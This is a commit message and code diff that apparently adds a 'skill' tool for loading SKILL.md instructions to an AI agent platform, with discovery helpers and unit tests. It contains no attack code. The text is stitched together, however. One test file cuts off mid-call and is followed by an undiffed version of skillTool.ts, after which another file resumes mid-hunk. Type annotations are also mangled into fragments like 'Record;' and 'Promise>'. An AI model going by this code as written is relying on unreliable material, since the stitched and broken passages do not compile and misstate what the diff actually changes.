\${workingDirectory}/.claude/skills/ (project, claude-style) - \${workingDirectory}/.agents/skills/ (project, agents-style) - \${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills) Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands. 
Changes: - getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root) - exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable - Handler awaits the async path resolution - New test suite covers all 3 paths + $HOME variants Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong. Full suite 3053/3053; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback) Two changes per user direction: 1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array. 2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast. Verified live on preview against \`recoupable/org-rostrum-pacific-...\` BEFORE this commit: - Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace) - Agent invoked \`skill({ skill: "recoup-api" })\` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header Full suite 3055/3055; lint clean; production build succeeds. 
Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite: - lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists) - lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts - 2 new unit tests (standard path, trailing-slash tolerance) discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file). Full suite passes; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 2 +- lib/agent/__tests__/buildAgentTools.test.ts | 47 ++++- lib/agent/buildAgentTools.ts | 24 +-- lib/agent/tools/AgentContext.ts | 11 ++ lib/agent/tools/__tests__/skillTool.test.ts | 169 ++++++++++++++++++ lib/agent/tools/skillTool.ts | 87 +++++++++ .../handleChatWorkflowStream.test.ts | 13 ++ lib/chat/handleChatWorkflowStream.ts | 21 +++ lib/skills/__tests__/discoverSkills.test.ts | 158 ++++++++++++++++ lib/skills/__tests__/extractSkillBody.test.ts | 22 +++ lib/skills/__tests__/findSkillFile.test.ts | 34 ++++ .../getGlobalSkillsDirectory.test.ts | 15 ++ .../getSandboxSkillDirectories.test.ts | 23 +++ lib/skills/__tests__/getSkills.test.ts | 31 ++++ .../__tests__/injectSkillDirectory.test.ts | 14 ++ .../__tests__/parseSkillFrontmatter.test.ts | 56 ++++++ .../__tests__/substituteArguments.test.ts | 22 +++ lib/skills/discoverSkills.ts | 89 +++++++++ lib/skills/extractSkillBody.ts | 14 ++ lib/skills/findSkillFile.ts | 33 ++++ lib/skills/getGlobalSkillsDirectory.ts | 14 ++ 
lib/skills/getSandboxSkillDirectories.ts | 16 ++ lib/skills/getSkills.ts | 22 +++ lib/skills/injectSkillDirectory.ts | 11 ++ lib/skills/parseSkillFrontmatter.ts | 52 ++++++ lib/skills/skillTypes.ts | 76 ++++++++ lib/skills/substituteArguments.ts | 14 ++ 27 files changed, 1071 insertions(+), 19 deletions(-) create mode 100644 lib/agent/tools/__tests__/skillTool.test.ts create mode 100644 lib/agent/tools/skillTool.ts create mode 100644 lib/skills/__tests__/discoverSkills.test.ts create mode 100644 lib/skills/__tests__/extractSkillBody.test.ts create mode 100644 lib/skills/__tests__/findSkillFile.test.ts create mode 100644 lib/skills/__tests__/getGlobalSkillsDirectory.test.ts create mode 100644 lib/skills/__tests__/getSandboxSkillDirectories.test.ts create mode 100644 lib/skills/__tests__/getSkills.test.ts create mode 100644 lib/skills/__tests__/injectSkillDirectory.test.ts create mode 100644 lib/skills/__tests__/parseSkillFrontmatter.test.ts create mode 100644 lib/skills/__tests__/substituteArguments.test.ts create mode 100644 lib/skills/discoverSkills.ts create mode 100644 lib/skills/extractSkillBody.ts create mode 100644 lib/skills/findSkillFile.ts create mode 100644 lib/skills/getGlobalSkillsDirectory.ts create mode 100644 lib/skills/getSandboxSkillDirectories.ts create mode 100644 lib/skills/getSkills.ts create mode 100644 lib/skills/injectSkillDirectory.ts create mode 100644 lib/skills/parseSkillFrontmatter.ts create mode 100644 lib/skills/skillTypes.ts create mode 100644 lib/skills/substituteArguments.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index f9a894195..704035c64 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -42,7 +42,7 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe }); const modelMessages = convertToModelMessages(input.messages); - const tools = buildAgentTools(); + const tools = buildAgentTools({ skills: input.agentContext.skills 
}); const result = streamText({ model: gateway(input.modelId), system: agentCustomInstructions, diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts index 5478c59ca..fb5d99a5a 100644 --- a/lib/agent/__tests__/buildAgentTools.test.ts +++ b/lib/agent/__tests__/buildAgentTools.test.ts @@ -1,7 +1,7 @@ import { describe, it, expect } from "vitest"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; -const EXPECTED_TOOL_NAMES = [ +const BASE_TOOLS = [ "bash", "read", "write", @@ -13,19 +13,50 @@ const EXPECTED_TOOL_NAMES = [ ] as const; describe("buildAgentTools", () => { - it("returns a tools record with all 8 leaf tools registered", () => { + it("returns the 8 leaf tools by default (no skill registered when skills list is empty)", () => { const tools = buildAgentTools(); - for (const name of EXPECTED_TOOL_NAMES) { + for (const name of BASE_TOOLS) { expect(tools).toHaveProperty(name); } + expect(tools).not.toHaveProperty("skill"); + }); + + it("registers the skill tool when a non-empty skill catalog is provided", () => { + const tools = buildAgentTools({ + skills: [ + { + name: "commit", + description: "Make a commit", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + ], + }); + expect(tools).toHaveProperty("skill"); + for (const name of BASE_TOOLS) { + expect(tools).toHaveProperty(name); + } + }); + + it("omits the skill tool when an empty array is passed", () => { + const tools = buildAgentTools({ skills: [] }); + expect(tools).not.toHaveProperty("skill"); }); it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => { - const tools = buildAgentTools() as Record< - string, - { description?: unknown; inputSchema?: unknown; execute?: unknown } - >; - for (const name of EXPECTED_TOOL_NAMES) { + const tools = buildAgentTools({ + skills: [ + { + name: "foo", + description: "x", + path: "/p", + filename: "SKILL.md", + options: {}, + }, + ], + }) as 
Record; + for (const name of [...BASE_TOOLS, "skill"]) { const t = tools[name]!; expect(typeof t.description).toBe("string"); expect(t.inputSchema).toBeDefined(); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts index f9cbc2b39..393b32889 100644 --- a/lib/agent/buildAgentTools.ts +++ b/lib/agent/buildAgentTools.ts @@ -6,24 +6,27 @@ import { grepTool } from "@/lib/agent/tools/grepTool"; import { globTool } from "@/lib/agent/tools/globTool"; import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool"; import { webFetchTool } from "@/lib/agent/tools/webFetchTool"; +import { skillTool } from "@/lib/agent/tools/skillTool"; +import type { SkillMetadata } from "@/lib/skills/skillTypes"; /** * Factory for the full agent tool set passed into `streamText({ tools })`. - * Each tool reads its sandbox handle + recoup creds from `experimental_context` - * at execute time — the factory takes no arguments because the tools are - * stateless modulo that context. + * Each tool reads its sandbox handle + per-prompt context from + * `experimental_context` at execute time — the factory is otherwise stateless. * - * Currently ships 8 leaf tools: - * - bash, read, write, edit, grep, glob (sandbox / file ops) + * Currently ships 9 tools: + * - 6 file/shell: bash, read, write, edit, grep, glob * - todo_write (planning surface; stateless, echoes the list back) * - web_fetch (HTTP via curl inside the sandbox) + * - skill (load a project-level skill's SKILL.md; only registered when the + * sandbox has skills available, so models without any skill catalog + * don't see the tool at all and never call it speculatively) * - * Composite tools (`task` subagent, `ask_user_question` UI part, - * `skill` skill discovery) port in a follow-up PR — they require - * subagent context plumbing / UI rendering / skill discovery infra - * that isn't in api today. + * @param options.skills - Discovered skill catalog. 
When empty / undefined, + * `skill` is omitted from the tool record so the model doesn't see it. */ -export function buildAgentTools() { +export function buildAgentTools(options: { skills?: SkillMetadata[] } = {}) { + const hasSkills = (options.skills?.length ?? 0) > 0; return { bash: bashTool, read: readFileTool, @@ -33,6 +36,7 @@ export function buildAgentTools() { glob: globTool, todo_write: todoWriteTool, web_fetch: webFetchTool, + ...(hasSkills ? { skill: skillTool } : {}), }; } diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts index 63d2a1b7e..acb455164 100644 --- a/lib/agent/tools/AgentContext.ts +++ b/lib/agent/tools/AgentContext.ts @@ -1,4 +1,5 @@ import type { VercelState } from "@/lib/sandbox/vercel/state"; +import type { SkillMetadata } from "@/lib/skills/skillTypes"; /** * Per-tool-call context threaded into the agent via `streamText`'s @@ -31,4 +32,14 @@ export type AgentContext = { * Public information — no security risk in exposing. */ recoupOrgId?: string; + /** + * Skills discovered in the sandbox before workflow start (handler + * calls `discoverSkills(sandbox, getSandboxSkillDirectories(sandbox))`). + * The `skillTool` reads this list to: + * - resolve names → SKILL.md paths + * - filter out skills with `disable-model-invocation` + * - surface "Available skills" hints when a model picks an unknown name + * Empty / undefined when the sandbox has no `skills/` directory. 
+ */ + skills?: SkillMetadata[]; }; diff --git a/lib/agent/tools/__tests__/skillTool.test.ts b/lib/agent/tools/__tests__/skillTool.test.ts new file mode 100644 index 000000000..0b3196dbc --- /dev/null +++ b/lib/agent/tools/__tests__/skillTool.test.ts @@ -0,0 +1,169 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { skillTool } from "@/lib/agent/tools/skillTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const baseCtx = { + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, +}; + +function makeSandbox(readFile: ReturnType) { + return { workingDirectory: "/sandbox/mono", readFile }; +} + +function skillMd(body: string) { + return `---\nname: commit\ndescription: Make a commit\n---\n\n${body}`; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("skillTool", () => { + it("returns success:false with available skills when the requested skill isn't in context", async () => { + vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never); + const result = (await skillTool.execute!({ skill: "unknown" }, { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "commit", + description: "Make a commit", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + { + name: "deploy", + description: "Deploy", + path: "/sandbox/mono/skills/deploy", + filename: "SKILL.md", + options: {}, + }, + ], + }, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/Available skills: commit, deploy/); + }); + + it("returns success:false when no skills are loaded", async () => { + vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never); + const result = (await skillTool.execute!({ skill: "commit" }, { + experimental_context: { ...baseCtx, skills: [] }, + } as never)) as 
{ success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/Available skills: none/); + }); + + it("matches the skill name case-insensitively (slash-command behavior)", async () => { + const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd("body content"))); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await skillTool.execute!( + { skill: "COMMIT" }, // model typed it loud + { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "commit", + description: "x", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + ], + }, + } as never, + )) as { success: boolean; skillName: string }; + expect(result.success).toBe(true); + expect(result.skillName).toBe("COMMIT"); + }); + + it("returns the SKILL.md body with skill directory injected", async () => { + const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd("Run git commit -m ..."))); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await skillTool.execute!({ skill: "commit" }, { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "commit", + description: "x", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + ], + }, + } as never)) as { success: boolean; content: string; skillPath: string }; + expect(result.success).toBe(true); + expect(result.skillPath).toBe("/sandbox/mono/skills/commit"); + expect(result.content).toContain("Skill directory: /sandbox/mono/skills/commit"); + expect(result.content).toContain("Run git commit -m ..."); + expect(sb.readFile).toHaveBeenCalledWith("/sandbox/mono/skills/commit/SKILL.md", "utf-8"); + }); + + it("substitutes $ARGUMENTS in the skill body when args are provided", async () => { + const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd('git commit -m "$ARGUMENTS"'))); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await skillTool.execute!({ skill: "commit", 
/**
 * `skill` — load a discovered skill's SKILL.md body and return it to the
 * model. The model then follows the loaded instructions in subsequent
 * turns (using `bash`, `read`, `write`, etc. to actually carry them out).
 * The skill catalog itself is discovered in the handler before workflow
 * start and threaded via `AgentContext.skills`.
 *
 * Matching is case-insensitive and tolerates surrounding whitespace and a
 * leading `/`, so a slash command like `/Commit` resolves against a skill
 * named `commit`. Skills marked with `disable-model-invocation` in their
 * frontmatter are rejected at the gate and are left out of the
 * "Available skills" hint, since the model cannot run them.
 *
 * The sandbox is only connected once a loadable skill has been resolved, so
 * unknown or disabled names fail fast without a sandbox round trip.
 *
 * Result shape:
 * - `{ success: true, skillName, skillPath, content }` — `skillName` echoes
 *   the name exactly as the caller supplied it.
 * - `{ success: false, error }` — unknown skill, model invocation disabled,
 *   or the skill file could not be read.
 */
export const skillTool = tool({
  description: `Execute a skill within the main conversation.

When users ask you to perform tasks, check if any of the available skills can help complete the task more effectively. Skills provide specialized capabilities and domain knowledge.

When users ask you to run a "slash command" or reference "/" (e.g., "/commit", "/review-pr"), they are referring to a skill. Use this tool to invoke the corresponding skill.

How to invoke:
- Use this tool with the skill name and optional arguments
- Examples:
  - skill: "pdf" — invoke the pdf skill
  - skill: "commit", args: "-m 'Fix bug'" — invoke with arguments

Important:
- When a skill is relevant, invoke this tool IMMEDIATELY as your first action
- When the user's message starts with "/", they are invoking a skill — call this tool FIRST before any other tool
- NEVER just announce or mention a skill without actually calling this tool
- Only use skills listed in "Available skills" in your system prompt`,
  inputSchema: skillInputSchema,
  execute: async ({ skill, args }, { experimental_context }) => {
    const skills = getSkills(experimental_context);

    // Accept "/Commit", " commit ", "COMMIT" … for a skill named "commit".
    const normalized = skill.trim().replace(/^\/+/, "").toLowerCase();
    const found = skills.find(s => s.name.toLowerCase() === normalized);
    if (!found) {
      // Only advertise skills the model is actually allowed to invoke.
      const available = skills
        .filter(s => !s.options.disableModelInvocation)
        .map(s => s.name)
        .join(", ");
      return {
        success: false,
        error: `Skill '${skill}' not found. Available skills: ${available || "none"}`,
      };
    }

    if (found.options.disableModelInvocation) {
      return {
        success: false,
        error: `Skill '${skill}' cannot be invoked by the model (disable-model-invocation is set)`,
      };
    }

    // Connect lazily: the checks above need no sandbox access.
    const sandbox = await getSandbox(experimental_context, "skill");

    const skillFilePath = path.join(found.path, found.filename);
    let fileContent: string;
    try {
      fileContent = await sandbox.readFile(skillFilePath, "utf-8");
    } catch (error) {
      const message = error instanceof Error ? error.message : String(error);
      return { success: false, error: `Failed to read skill file: ${message}` };
    }

    // Strip frontmatter → prepend the skill directory header → fill $ARGUMENTS.
    const body = extractSkillBody(fileContent);
    const bodyWithDir = injectSkillDirectory(body, found.path);
    const content = substituteArguments(bodyWithDir, args);

    return {
      success: true,
      skillName: skill,
      skillPath: found.path,
      content,
    };
  },
});
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(async () => ({ workingDirectory: "/sandbox/mono" })), +})); +vi.mock("@/lib/skills/discoverSkills", () => ({ + discoverSkills: vi.fn(async () => []), +})); +vi.mock("@/lib/skills/getSandboxSkillDirectories", () => ({ + getSandboxSkillDirectories: vi.fn(() => ["/sandbox/mono/skills"]), +})); + const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb"; const SESSION_ID = "22222222-2222-2222-2222-222222222222"; diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts index 6ceb0c867..818c70f8c 100644 --- a/lib/chat/handleChatWorkflowStream.ts +++ b/lib/chat/handleChatWorkflowStream.ts @@ -15,7 +15,10 @@ import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow"; import { extractOrgId } from "@/lib/recoupable/extractOrgId"; import { DEFAULT_WORKING_DIRECTORY } from "@/lib/sandbox/vercel/sandbox/constants"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; import type { VercelState } from "@/lib/sandbox/vercel/state"; +import { discoverSkills } from "@/lib/skills/discoverSkills"; +import { getSandboxSkillDirectories } from "@/lib/skills/getSandboxSkillDirectories"; import generateUUID from "@/lib/uuid/generateUUID"; const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5"; @@ -90,6 +93,23 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise> = []; + try { + const sandbox = await connectVercel(session.sandbox_state as VercelState); + const dirs = await getSandboxSkillDirectories(sandbox); + skills = await discoverSkills(sandbox, dirs); + } catch (error) { + console.error( + "[handleChatWorkflowStream] skill discovery failed; continuing with empty catalog:", + error, + ); + } + const run = await start(runAgentWorkflow, [ { messages: validated.messages, @@ -105,6 
+125,7 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise isDir, isFile: () => !isDir, size: 0, mtimeMs: 0 }; +} + +function makeDirent(name: string, isDir: boolean) { + return { + name, + isDirectory: () => isDir, + isFile: () => !isDir, + isSymbolicLink: () => false, + isBlockDevice: () => false, + isCharacterDevice: () => false, + isFIFO: () => false, + isSocket: () => false, + }; +} + +function frontmatter(name: string, description: string, extra = "") { + return `---\nname: ${name}\ndescription: ${description}\n${extra}---\n\nBody for ${name}`; +} + +function makeSandbox() { + const files = new Map(); + return { + files, + workingDirectory: "/sandbox/mono", + stat: vi.fn(async (path: string) => { + if (path.endsWith("/skills")) return makeStat(true); + if (path.startsWith("/sandbox/mono/skills/") && !path.endsWith(".md")) return makeStat(true); + throw new Error(`ENOENT: ${path}`); + }), + readdir: vi.fn(), + access: vi.fn(async (path: string) => { + if (!files.has(path)) throw new Error(`ENOENT: ${path}`); + }), + readFile: vi.fn(async (path: string) => { + const content = files.get(path); + if (content === undefined) throw new Error(`ENOENT: ${path}`); + return content; + }), + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("discoverSkills", () => { + it("discovers a single skill with name + description + path", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("commit", true)]); + sb.files.set("/sandbox/mono/skills/commit/SKILL.md", frontmatter("commit", "Make a commit")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]).toMatchObject({ + name: "commit", + description: "Make a commit", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + }); + }); + + it("falls back to lowercase skill.md when SKILL.md is missing", async () => { + const sb = makeSandbox(); + 
sb.readdir.mockResolvedValue([makeDirent("lowercase", true)]); + sb.files.set("/sandbox/mono/skills/lowercase/skill.md", frontmatter("lowercase", "lc")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.filename).toBe("skill.md"); + }); + + it("returns [] when the directory does not exist", async () => { + const sb = makeSandbox(); + sb.stat.mockRejectedValue(new Error("ENOENT")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toEqual([]); + }); + + it("skips entries that aren't directories", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("README.md", false), makeDirent("good", true)]); + sb.files.set("/sandbox/mono/skills/good/SKILL.md", frontmatter("good", "yes")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.name).toBe("good"); + }); + + it("skips subdirs without SKILL.md / skill.md", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("empty", true), makeDirent("real", true)]); + sb.files.set("/sandbox/mono/skills/real/SKILL.md", frontmatter("real", "yes")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.name).toBe("real"); + }); + + it("skips skills with invalid frontmatter (missing required fields)", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("broken", true), makeDirent("ok", true)]); + sb.files.set("/sandbox/mono/skills/broken/SKILL.md", "---\nname: broken\n---\nno desc"); + sb.files.set("/sandbox/mono/skills/ok/SKILL.md", frontmatter("ok", "yes")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.name).toBe("ok"); + }); + + it("skips skills whose names shadow built-in 
commands (model / resume / new)", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([ + makeDirent("model", true), + makeDirent("resume", true), + makeDirent("new", true), + makeDirent("kept", true), + ]); + for (const name of ["model", "resume", "new", "kept"]) { + sb.files.set(`/sandbox/mono/skills/${name}/SKILL.md`, frontmatter(name, "x")); + } + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills.map(s => s.name)).toEqual(["kept"]); + }); + + it("dedupes by name across multiple directories (first wins, case-insensitive)", async () => { + const sb = makeSandbox(); + sb.readdir.mockImplementation(async (dir: string) => { + if (dir === "/sandbox/mono/skills") return [makeDirent("Foo", true)] as never; + if (dir === "/global/.skills") return [makeDirent("foo", true)] as never; + return []; + }); + sb.files.set("/sandbox/mono/skills/Foo/SKILL.md", frontmatter("Foo", "project")); + sb.files.set("/global/.skills/foo/SKILL.md", frontmatter("foo", "global")); + sb.stat.mockImplementation(async (p: string) => { + if (p === "/sandbox/mono/skills" || p === "/global/.skills") return makeStat(true); + throw new Error("ENOENT"); + }); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills", "/global/.skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.description).toBe("project"); // first dir wins + }); + + it("populates options from frontmatter (camelCase + split lists)", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("scoped", true)]); + sb.files.set( + "/sandbox/mono/skills/scoped/SKILL.md", + frontmatter( + "scoped", + "limited", + "allowed-tools: bash, read\ndisable-model-invocation: true\n", + ), + ); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills[0]?.options).toEqual({ + disableModelInvocation: true, + allowedTools: ["bash", "read"], + }); + }); +}); diff --git 
a/lib/skills/__tests__/extractSkillBody.test.ts b/lib/skills/__tests__/extractSkillBody.test.ts new file mode 100644 index 000000000..b8f62bbc8 --- /dev/null +++ b/lib/skills/__tests__/extractSkillBody.test.ts @@ -0,0 +1,22 @@ +import { describe, it, expect } from "vitest"; +import { extractSkillBody } from "@/lib/skills/extractSkillBody"; + +describe("extractSkillBody", () => { + it("strips YAML frontmatter and returns the body", () => { + const md = "---\nname: foo\ndescription: bar\n---\n# Heading\n\nBody."; + expect(extractSkillBody(md)).toBe("# Heading\n\nBody."); + }); + + it("returns the full content when no frontmatter is present", () => { + expect(extractSkillBody("# Just a heading")).toBe("# Just a heading"); + }); + + it("trims surrounding whitespace", () => { + expect(extractSkillBody("---\nname: x\ndescription: y\n---\n\n\nbody\n\n")).toBe("body"); + }); + + it("tolerates Windows-style CRLF line endings", () => { + const md = "---\r\nname: foo\r\ndescription: bar\r\n---\r\nbody"; + expect(extractSkillBody(md)).toBe("body"); + }); +}); diff --git a/lib/skills/__tests__/findSkillFile.test.ts b/lib/skills/__tests__/findSkillFile.test.ts new file mode 100644 index 000000000..2d15de6fa --- /dev/null +++ b/lib/skills/__tests__/findSkillFile.test.ts @@ -0,0 +1,34 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { findSkillFile } from "@/lib/skills/findSkillFile"; + +beforeEach(() => vi.clearAllMocks()); + +function makeSandbox(existing: string[]) { + const set = new Set(existing); + return { + access: vi.fn(async (p: string) => { + if (!set.has(p)) throw new Error(`ENOENT: ${p}`); + }), + }; +} + +describe("findSkillFile", () => { + it("prefers uppercase SKILL.md when both casings exist", async () => { + const sb = makeSandbox(["/skills/foo/SKILL.md", "/skills/foo/skill.md"]); + const result = await findSkillFile(sb as never, "/skills/foo"); + expect(result).toBe("/skills/foo/SKILL.md"); + 
expect(sb.access).toHaveBeenCalledWith("/skills/foo/SKILL.md"); + }); + + it("falls back to lowercase skill.md when SKILL.md is missing", async () => { + const sb = makeSandbox(["/skills/foo/skill.md"]); + const result = await findSkillFile(sb as never, "/skills/foo"); + expect(result).toBe("/skills/foo/skill.md"); + }); + + it("returns null when neither casing exists", async () => { + const sb = makeSandbox([]); + const result = await findSkillFile(sb as never, "/skills/foo"); + expect(result).toBeNull(); + }); +}); diff --git a/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts b/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts new file mode 100644 index 000000000..7833f2450 --- /dev/null +++ b/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts @@ -0,0 +1,15 @@ +import { describe, it, expect } from "vitest"; +import { getGlobalSkillsDirectory } from "@/lib/skills/getGlobalSkillsDirectory"; + +describe("getGlobalSkillsDirectory", () => { + it("returns /.agents/skills", () => { + expect(getGlobalSkillsDirectory("/root")).toBe("/root/.agents/skills"); + expect(getGlobalSkillsDirectory("/home/vercel-sandbox")).toBe( + "/home/vercel-sandbox/.agents/skills", + ); + }); + + it("handles trailing slash on input", () => { + expect(getGlobalSkillsDirectory("/root/")).toBe("/root/.agents/skills"); + }); +}); diff --git a/lib/skills/__tests__/getSandboxSkillDirectories.test.ts b/lib/skills/__tests__/getSandboxSkillDirectories.test.ts new file mode 100644 index 000000000..5762ccea1 --- /dev/null +++ b/lib/skills/__tests__/getSandboxSkillDirectories.test.ts @@ -0,0 +1,23 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { getSandboxSkillDirectories } from "@/lib/skills/getSandboxSkillDirectories"; +import { resolveSandboxHomeDirectory } from "@/lib/sandbox/resolveSandboxHomeDirectory"; + +vi.mock("@/lib/sandbox/resolveSandboxHomeDirectory", () => ({ + resolveSandboxHomeDirectory: vi.fn(), +})); + +beforeEach(() => vi.clearAllMocks()); + 
+describe("getSandboxSkillDirectories", () => { + it("returns just the global skill dir under the resolved $HOME", async () => { + vi.mocked(resolveSandboxHomeDirectory).mockResolvedValue("/home/vercel-sandbox"); + const dirs = await getSandboxSkillDirectories({ workingDirectory: "/sandbox/mono" } as never); + expect(dirs).toEqual(["/home/vercel-sandbox/.agents/skills"]); + }); + + it("works with the /root fallback (open-agents base image)", async () => { + vi.mocked(resolveSandboxHomeDirectory).mockResolvedValue("/root"); + const dirs = await getSandboxSkillDirectories({ workingDirectory: "/x" } as never); + expect(dirs).toEqual(["/root/.agents/skills"]); + }); +}); diff --git a/lib/skills/__tests__/getSkills.test.ts b/lib/skills/__tests__/getSkills.test.ts new file mode 100644 index 000000000..8ffd47e24 --- /dev/null +++ b/lib/skills/__tests__/getSkills.test.ts @@ -0,0 +1,31 @@ +import { describe, it, expect } from "vitest"; +import { getSkills } from "@/lib/skills/getSkills"; + +const validCtx = { + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, +}; + +const sample = { + name: "recoup-api", + description: "Recoupable API skill", + path: "/home/vercel-sandbox/.agents/skills/recoup-api", + filename: "SKILL.md", + options: {}, +}; + +describe("getSkills", () => { + it("returns the skills array when present in a valid AgentContext", () => { + expect(getSkills({ ...validCtx, skills: [sample] })).toEqual([sample]); + }); + + it("returns [] when no skills field is set", () => { + expect(getSkills(validCtx)).toEqual([]); + }); + + it("returns [] for malformed contexts (non-AgentContext shape)", () => { + expect(getSkills(undefined)).toEqual([]); + expect(getSkills(null)).toEqual([]); + expect(getSkills({ noSandbox: true })).toEqual([]); + expect(getSkills({ sandbox: null })).toEqual([]); + }); +}); diff --git a/lib/skills/__tests__/injectSkillDirectory.test.ts b/lib/skills/__tests__/injectSkillDirectory.test.ts new file mode 100644 index 
